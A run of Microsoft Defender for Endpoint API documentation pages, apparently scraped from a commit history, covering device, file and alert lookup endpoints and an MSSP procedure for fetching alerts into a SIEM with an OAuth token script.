- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2021-01-25T07:27:36.052313Z",
- "osPlatform": "Windows10",
- "osProcessor": "x64",
- "version": "1901",
- "lastIpAddress": "10.166.113.46",
- "lastExternalIpAddress": "167.220.203.175",
- "osBuild": 19042,
- "healthStatus": "Active",
- "deviceValue": "Normal",
- "rbacGroupName": "The-A-Team",
- "riskScore": "Low",
- "exposureLevel": "Low",
- "aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
- "machineTags": [
- "Tag1",
- "Tag2"
- ],
- "ipAddresses": [
- {
- "ipAddress": "10.166.113.47",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- },
- {
- "ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
- "macAddress": "8CEC4B897E73",
- "operationalStatus": "Up"
- }
- ]
- },
- ...
- ]
-}
-```
-
-## See also
-
-[Microsoft Defender for Endpoint APIs](apis-intro.md)
security Fetch Alerts Mssp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/fetch-alerts-mssp.md
- Title: Fetch alerts from MSSP customer tenant
-description: Learn how to fetch alerts from a customer tenant
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Fetch alerts from MSSP customer tenant
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> This action is taken by the MSSP.
-
-There are two ways you can fetch alerts:
--- Using the SIEM method-- Using APIs-
-## Fetch alerts into your SIEM
-
-To fetch alerts into your SIEM system, you'll need to take the following steps:
--- Step 1: Create a third-party application-- Step 2: Get access and refresh tokens from your customer's tenant-- Step 3: allow your application on Microsoft Defender XDR-
-<a name='step-1-create-an-application-in-azure-active-directory-azure-ad'></a>
-
-### Step 1: Create an application in Microsoft Entra ID
-
-You'll need to create an application and grant it permissions to fetch alerts from your customer's Microsoft Defender XDR tenant.
-
-1. Sign in to the [Microsoft Entra admin center](https://aad.portal.azure.com/).
-
-2. Select **Microsoft Entra ID** \> **App registrations**.
-
-3. Click **New registration**.
-
-4. Specify the following values:
-
- - Name: \<Tenant_name\> SIEM MSSP Connector (replace Tenant_name with the tenant display name)
-
- - Supported account types: Account in this organizational directory only
- - Redirect URI: Select Web and type `https://<domain_name>/SiemMsspConnector`(replace <domain_name> with the tenant name)
-
-5. Click **Register**. The application is displayed in the list of applications you own.
-
-6. Select the application, then click **Overview**.
-
-7. Copy the value from the **Application (client) ID** field to a safe place, you will need this in the next step.
-
-8. Select **Certificate & secrets** in the new application panel.
-
-9. Click **New client secret**.
-
- - Description: Enter a description for the key.
- - Expires: Select **In 1 year**
-
-10. Click **Add**, copy the value of the client secret to a safe place, you will need this in the next step.
-
-### Step 2: Get access and refresh tokens from your customer's tenant
-
-This section guides you on how to use a PowerShell script to get the tokens from your customer's tenant. This script uses the application from the previous step to get the access and refresh tokens using the OAuth Authorization Code Flow.
-
-After providing your credentials, you'll need to grant consent to the application so that the application is provisioned in the customer's tenant.
-
-1. Create a new folder and name it: `MsspTokensAcquisition`.
-
-2. Download the [LoginBrowser.psm1 module](https://github.com/shawntabrizi/Microsoft-Authentication-with-PowerShell-and-MSAL/blob/master/Authorization%20Code%20Grant%20Flow/LoginBrowser.psm1) and save it in the `MsspTokensAcquisition` folder.
-
- > [!NOTE]
- > In line 30, replace `authorzationUrl` with `authorizationUrl`.
-
-3. Create a file with the following content and save it with the name `MsspTokensAcquisition.ps1` in the folder:
-
- ```powershell
- param (
- [Parameter(Mandatory=$true)][string]$clientId,
- [Parameter(Mandatory=$true)][string]$secret,
- [Parameter(Mandatory=$true)][string]$tenantId
- )
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-
- # Load our Login Browser Function
- Import-Module .\LoginBrowser.psm1
-
- # Configuration parameters
- $login = "https://login.microsoftonline.com"
- $redirectUri = "https://SiemMsspConnector"
- $resourceId = "https://graph.windows.net"
-
- Write-Host 'Prompt the user for his credentials, to get an authorization code'
- $authorizationUrl = ("{0}/{1}/oauth2/authorize?prompt=select_account&response_type=code&client_id={2}&redirect_uri={3}&resource={4}" -f
- $login, $tenantId, $clientId, $redirectUri, $resourceId)
- Write-Host "authorzationUrl: $authorizationUrl"
-
- # Fake a proper endpoint for the Redirect URI
- $code = LoginBrowser $authorizationUrl $redirectUri
-
- # Acquire token using the authorization code
-
- $Body = @{
- grant_type = 'authorization_code'
- client_id = $clientId
- code = $code
- redirect_uri = $redirectUri
- resource = $resourceId
- client_secret = $secret
- }
-
- $tokenEndpoint = "$login/$tenantId/oauth2/token?"
- $Response = Invoke-RestMethod -Method Post -Uri $tokenEndpoint -Body $Body
- $token = $Response.access_token
- $refreshToken= $Response.refresh_token
-
- Write-Host " -- TOKEN - "
- Write-Host $token
-
- Write-Host " -- REFRESH TOKEN - "
- Write-Host $refreshToken
- ```
-4. Open an elevated PowerShell command prompt in the `MsspTokensAcquisition` folder.
-
-5. Run the following command:
- `Set-ExecutionPolicy -ExecutionPolicy Bypass`
-
-6. Enter the following commands: `.\MsspTokensAcquisition.ps1 -clientId <client_id> -secret <app_key> -tenantId <customer_tenant_id>`
-
- - Replace \<client_id\> with the **Application (client) ID** you got from the previous step.
- - Replace \<app_key\> with the **Client Secret** you created from the previous step.
- - Replace \<customer_tenant_id\> with your customer's **Tenant ID**.
-
-7. You'll be asked to provide your credentials and consent. Ignore the page redirect.
-
-8. In the PowerShell window, you'll receive an access token and a refresh token. Save the refresh token to configure your SIEM connector.
-
-<a name='step-3-allow-your-application-on-microsoft-365-defender'></a>
-
-### Step 3: Allow your application on Microsoft Defender XDR
-
-You'll need to allow the application you created in Microsoft Defender XDR.
-
-You'll need to have **Manage portal system settings** permission to allow the application. Otherwise, you'll need to request your customer to allow the application for you.
-
-1. Go to `https://security.microsoft.com?tid=<customer_tenant_id>` (replace \<customer_tenant_id\> with the customer's tenant ID.
-
-2. Click **Settings** \> **Endpoints** \> **APIs** \> **SIEM**.
-
-3. Select the **MSSP** tab.
-
-4. Enter the **Application ID** from the first step and your **Tenant ID**.
-
-5. Click **Authorize application**.
-
-You can now download the relevant configuration file for your SIEM and connect to the Microsoft Defender XDR API. For more information, see, [Pull alerts to your SIEM tools](../configure-siem.md).
--- In the ArcSight configuration file / Splunk Authentication Properties file, write your application key manually by setting the secret value.-- Instead of acquiring a refresh token in the portal, use the script from the previous step to acquire a refresh token (or acquire it by other means).-
-## Fetch alerts from MSSP customer's tenant using APIs
-
-For information on how to fetch alerts using REST API, see [Fetch alerts from MSSP customer tenant](fetch-alerts-mssp.md).
-
-## See also
--- [Grant MSSP access to the portal](../grant-mssp-access.md)-- [Access the MSSP customer portal](../access-mssp-portal.md)-- [Configure alert notifications](../configure-mssp-notifications.md)
security Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/files.md
- Title: File resource type
-description: Retrieve recent Microsoft Defender for Endpoint alerts related to files.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# File resource type
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Represent a file entity in Defender for Endpoint.
-
-## Methods
-
-|Method|Return Type |Description|
-|:|:|:|
-|[Get file](get-file-information.md) | [file](files.md) | Get a single file |
-|[List file related alerts](get-file-related-alerts.md) | [alert](alerts.md) collection | Get the [alert](alerts.md) entities that are associated with the file.|
-|[List file related machines](get-file-related-machines.md) | [machine](machine.md) collection | Get the [machine](machine.md) entities associated with the alert.|
-|[file statistics](get-file-statistics.md) | Statistics summary | Retrieves the prevalence for the given file.|
--
-## Properties
-
-|Property | Type | Description |
-|:|:|:|
-|sha1 | String | Sha1 hash of the file content |
-|sha256 | String | Sha256 hash of the file content |
-|globalPrevalence | Nullable long | File prevalence across organization |
-|globalFirstObserved | DateTimeOffset | First time the file was observed |
-|globalLastObserved | DateTimeOffset | Last time the file was observed |
-|size | Nullable long | Size of the file |
-|fileType | String | Type of the file |
-|isPeFile | Boolean | true if the file is portable executable (for example `DLL`, `EXE`, etc.) |
-|filePublisher | String | File publisher |
-|fileProductName | String | Product name |
-|signer | String | File signer |
-|issuer | String | File issuer |
-|signerHash | String | Hash of the signing certificate |
-|isValidCertificate | Boolean | Was signing certificate successfully verified by Microsoft Defender for Endpoint agent |
-|determinationType | String | The determination type of the file |
-|determinationValue | String | Determination value |
-
-## Json representation
-
-```json
-{
- "sha1": "4388963aaa83afe2042a46a3c017ad50bdcdafb3",
- "sha256": "413c58c8267d2c8648d8f6384bacc2ae9c929b2b96578b6860b5087cd1bd6462",
- "globalPrevalence": 180022,
- "globalFirstObserved": "2017-09-19T03:51:27.6785431Z",
- "globalLastObserved": "2020-01-06T03:59:21.3229314Z",
- "size": 22139496,
- "fileType": "APP",
- "isPeFile": true,
- "filePublisher": "CHENGDU YIWO Tech Development Co., Ltd.",
- "fileProductName": "EaseUS MobiSaver for Android",
- "signer": "CHENGDU YIWO Tech Development Co., Ltd.",
- "issuer": "VeriSign Class 3 Code Signing 2010 CA",
- "signerHash": "6c3245d4a9bc0244d99dff27af259cbbae2e2d16",
- "isValidCertificate": false,
- "determinationType": "Pua",
- "determinationValue": "PUA:Win32/FusionCore"
-}
-```
security Find Machine Info By Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/find-machine-info-by-ip.md
- Title: Find device information by internal IP API
-description: Use this API to create calls related to finding a device entry around a specific timestamp by internal IP.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Find device information by internal IP API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Find a device by internal IP.
-
-> [!NOTE]
-> The timestamp must be within the last 30 days.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-
-## HTTP request
-
-```http
-GET /api/machines/find(timestamp={time},key={IP})
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and machine exists - 200 OK.
-If no machine found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://graph.microsoft.com/testwdatppreview/machines/find(timestamp=2018-06-19T10:00:00Z,key='10.166.93.61')
-Content-type: application/json
-```
-
-### Response example
-
-Here's an example of the response.
-
-The response will return a list of all devices that reported this IP address within 16 minutes prior and after the timestamp.
-
-```json
-HTTP/1.1 200 OK
-Content-type: application/json
-{
- "@odata.context": "https://graph.microsoft.com/testwdatppreview/$metadata#Machines",
- "value": [
- {
- "id": "04c99d46599f078f1c3da3783cf5b95f01ac61bb",
- "computerDnsName": "",
- "firstSeen": "2017-07-06T01:25:04.9480498Z",
- "osPlatform": "Windows10",
-...
-}
-```
security Find Machines By Ip https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/find-machines-by-ip.md
- Title: Find devices by internal IP API
-description: Find devices seen with the requested internal IP in the time range of 15 minutes prior and after a given timestamp
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Find devices by internal IP API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Find [Machines](machine.md) seen with the requested internal IP in the time range of 15 minutes prior and after a given timestamp.
-
-## Limitations
-
-1. The given timestamp must be in the past 30 days.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - Response will include only devices that the user have access to based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - Response will include only devices that the user have access to based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/machines/findbyip(ip='{IP}',timestamp={TimeStamp})
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful - 200 OK with list of the machines in the response body.
-If the timestamp isn't in the past 30 days - 400 Bad Request.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/findbyip(ip='10.248.240.38',timestamp=2019-09-22T08:44:05Z)
-```
security Find Machines By Tag https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/find-machines-by-tag.md
- Title: Find devices by tag API
-description: Find all devices that contain specific tag
------- m365-security-- tier3-- must-keep--- Previously updated : 02/02/2021--
-# Find devices by tag API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Find [Machines](machine.md) by [Tag](../machine-tags.md).
-
-`startswith` query is supported.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - Response will include only devices that the user have access to based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - Response will include only devices that the user have access to based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/machines/findbytag?tag={tag}&useStartsWithFilter={true/false}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request URI parameters
-
-Name|Type|Description
-:|:|:
-tag|String|The tag name. **Required**.
-useStartsWithFilter|Boolean|When set to true, the search finds all devices with tag name that starts with the given tag in the query. Defaults to false. **Optional**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful - 200 OK with list of the machines in the response body.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/findbytag?tag=testTag&useStartsWithFilter=true
-```
security Get Alert Info By Id https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alert-info-by-id.md
- Title: Get alert information by ID API
-description: Learn how to use the Get alert information by ID API to retrieve a specific alert by its ID in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get alert information by ID API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves specific [Alert](alerts.md) by its ID.
-
-## Limitations
--- You can get alerts last updated according to your configured retention period.-- Rate limitations for this API are 100 calls per minute and 1500 calls per hour.-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alert.Read.All|'Read all alerts'
-Application|Alert.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account)|Alert.Read|'Read alerts'
-Delegated (work or school account)|Alert.ReadWrite|'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - The user needs to have access to the device associated with the alert, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 OK, and the [alert](alerts.md) entity in the response body. If an alert with the specified ID wasn't found - 404 Not Found.
security Get Alert Related Domain Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alert-related-domain-info.md
- Title: Get alert related domains information
-description: Retrieve all domains related to a specific alert using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get alert related domain information API
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves all domains related to a specific alert.
-
-## Limitations
-
-1. You can query on alerts last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|URL.Read.All|'Read URLs'
-Delegated (work or school account)|URL.Read.All|'Read URLs'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md))
-> - The user needs to have access to the device associated with the alert, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md))
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts/{id}/domains
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and alert and domain exist - 200 OK. If alert not found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/alerts/636688558380765161_2136280442/domains
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/$metadata#Domains",
- "value": [
- {
- "host": "www.example.com"
- },
- {
- "host": "www.example2.com"
- }
- ...
- ]
-}
-```
security Get Alert Related Files Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alert-related-files-info.md
- Title: Get alert related files information
-description: Retrieve all files related to a specific alert using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get alert related files information API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves all files related to a specific alert.
-
-## Limitations
-
-1. You can query on alerts last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|File.Read.All|'Read file profiles'
-Delegated (work or school account)|File.Read.All|'Read file profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device associated with the alert, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts/{id}/files
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and alert and files exist - 200 OK. If alert not found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/alerts/636688558380765161_2136280442/files
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Files",
- "value": [
- {
- "sha1": "f2a00fd2f2de1be0214b8529f1e9f67096c1aa70",
- "sha256": "dcd71ef5fff4362a9f64cf3f96f14f2b11d6f428f3badbedcb9ff3361e7079aa",
- "md5": "8d5b7cc9a832e21d22503057e1fec8e9",
- "globalPrevalence": 29,
- "globalFirstObserved": "2019-03-23T23:54:06.0135204Z",
- "globalLastObserved": "2019-04-23T00:43:20.0489831Z",
- "size": 113984,
- "fileType": null,
- "isPeFile": true,
- "filePublisher": "Microsoft Corporation",
- "fileProductName": "Microsoft© Windows© Operating System",
- "signer": "Microsoft Corporation",
- "issuer": "Microsoft Code Signing PCA",
- "signerHash": "9dc17888b5cfad98b3cb35c1994e96227f061675",
- "isValidCertificate": true,
- "determinationType": "Unknown",
- "determinationValue": null
- }
- ...
- ]
-}
-```
security Get Alert Related Ip Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alert-related-ip-info.md
- Title: Get alert-related IPs' information
-description: Retrieve all IPs related to a specific alert using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get alert-related IPs' information API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-
-Retrieves all IPs related to a specific alert.
-
-## Limitations
-
-1. You can query on alerts last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Ip.Read.All|'Read IP address profiles'
-Delegated (work or school account)|Ip.Read.All|'Read IP address profiles'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (For more information, see [Create and manage roles](../user-roles.md)
-> - The user needs to have access to the device associated with the alert, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts/{id}/ips
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and alert and an IP exist - 200 OK. If alert not found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/alerts/636688558380765161_2136280442/ips
-```
-
-### Response example
-
-Here's an example of the response.
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/$metadata#Ips",
- "value": [
- {
- "id": "104.80.104.128"
- },
- {
- "id": "23.203.232.228
- }
- ...
- ]
-}
-```
security Get Alert Related Machine Info https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-alert-related-machine-info.md
- Title: Get alert related machine information
-description: Retrieve all devices related to a specific alert using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Get alert related machine information API
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Retrieves [Device](machine.md) related to a specific alert.
-
-## Limitations
-
-1. You can query on alerts last updated according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All|'Read all machine information'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.Read|'Read machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'View Data' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device associated with the alert, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-GET /api/alerts/{id}/machine
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful and alert and device exist - 200 OK. If alert not found or device not found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here is an example of the request.
-
-```http
-GET https://api.securitycenter.microsoft.com/api/alerts/636688558380765161_2136280442/machine
-```
-
-### Response example
-
-Here is an example of the response.
-
-```json
-{
- "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
- "computerDnsName": "mymachine1.contoso.com",
- "firstSeen": "2018-08-02T14:55:03.7791856Z",
- "lastSeen": "2021-01-25T07:27:36.052313Z",
- "osPlatform": "Windows10" "Windows11",
- "osProcessor": "x64",
- "version": "1901",
- "lastIpAddress": "10.166.113.46",
- "lastExternalIpAddress": "167.220.203.175",
- "osBuild": 19042,
- "healthStatus": "Active",
- "deviceValue": "Normal",
